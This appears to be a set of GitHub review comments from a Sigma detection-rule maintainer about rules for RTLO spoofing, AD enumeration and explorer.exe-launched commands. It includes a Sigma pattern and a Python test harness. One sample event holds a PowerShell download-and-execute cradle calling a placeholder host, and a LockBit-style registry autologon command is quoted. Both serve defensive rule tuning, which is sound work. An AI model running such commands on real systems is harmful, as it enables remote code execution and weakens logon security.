frack113
Looks fine to me
Hi, for RTLO there is already a rule: https://github.com/SigmaHQ/sigma/blob/2bfb0935a08c52859f2653bf51dbf9f4bbb5d7aa/rules/windows/file/file_event/file_event_win_susp_right_to_left_override_extension_spoofing.yml. It is better to update the old one, as they are similar.
Hi, the purpose of the rule is to detect Active Directory enumeration, and with the update even starting adfind will generate a high alert. I think it is better to put...
Hi, https://github.com/CheraghiMilad/bypass-Neo23x0-auditd-config/blob/f1c478a37911a5447d5ffcd580f22b167bf3df14/prctl-syscall/README.md is not found. a0 is https://man7.org/linux/man-pages/man2/PR_SET_NAME.2const.html, isn't it?
Thanks for the video and the link fix. With only `"a0": "f",` and no source code, I had to read the C header to find PR_SET_NAME 😄
I prefer to stay with the pattern:

```yaml
selection_parent:
    ParentImage|endswith: '\explorer.exe'
    CommandLine|contains: '#'
selection_cmd:
    CommandLine|contains:
        # Add more suspicious keywords
```

`CommandLine|contains: 'http'` may have too many false positives.
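An added example (not code from the Sigma rule or from the comment above): a minimal evaluator for the two Sigma modifiers used in that pattern, run over constructed process-creation events, to show how a broad `selection_cmd` keyword such as `http` also matches benign explorer-launched commands. It assumes the rule condition is `all of selection_*` and that matching is case-insensitive, as Sigma modifiers are by default.

```python
# Added example, not from SigmaHQ or the commenter. Assumptions: the rule
# condition is "all of selection_*" and matching is case-insensitive.

def endswith(value, suffix):
    return value.lower().endswith(suffix.lower())

def contains(value, needle):
    return needle.lower() in value.lower()

def selection_parent(event):
    # selection_parent from the quoted pattern: explorer.exe parent and '#' in the command line
    return (endswith(event.get("ParentImage", ""), "\\explorer.exe")
            and contains(event.get("CommandLine", ""), "#"))

def selection_cmd(event, keywords):
    # selection_cmd: CommandLine|contains any of the listed keywords
    return any(contains(event.get("CommandLine", ""), k) for k in keywords)

def rule_matches(event, keywords):
    return selection_parent(event) and selection_cmd(event, keywords)

# Constructed sample events (Sysmon event ID 1 style field names), not real telemetry.
EVENTS = [
    # suspicious: download cradle started from explorer.exe
    {"ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -NoP -c \"iex ((New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/x#y'))\""},
    # benign: user double-clicks a link that opens a browser on an in-page anchor
    {"ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Program Files\Browser\browser.exe" "http://intranet.example.invalid/page#section"'},
    # unrelated: not started from explorer.exe
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": "svchost.exe -k netsvcs"},
]

def count_matches(keywords):
    # number of constructed events the rule fires on for a given keyword list
    return sum(rule_matches(e, keywords) for e in EVENTS)

if __name__ == "__main__":
    print("keyword 'http'          ->", count_matches(["http"]))            # 2 (includes the benign browser launch)
    print("keyword 'downloadstring' ->", count_matches(["downloadstring"]))  # 1
```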
Hi, sorry, it took me a while to do the research, but the rule https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_reg_susp_paths.yml covers it. Found an atomic test from LockBit: https://github.com/redcanaryco/atomic-red-team/blob/8ac5c4f84692b11ea2832d18d3dc6f1ce7fb4e41/atomics/T1562.001/T1562.001.md#atomic-test-33---lockbit-black---use-registry-editor-to-turn-on-automatic-logon--cmd

```cmd
reg add "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t...
```
[5e6a80c8-2d45-4633-9ef4-fa2671a39c5c](https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_double_extension_parent.yml) should be updated too, shouldn't it?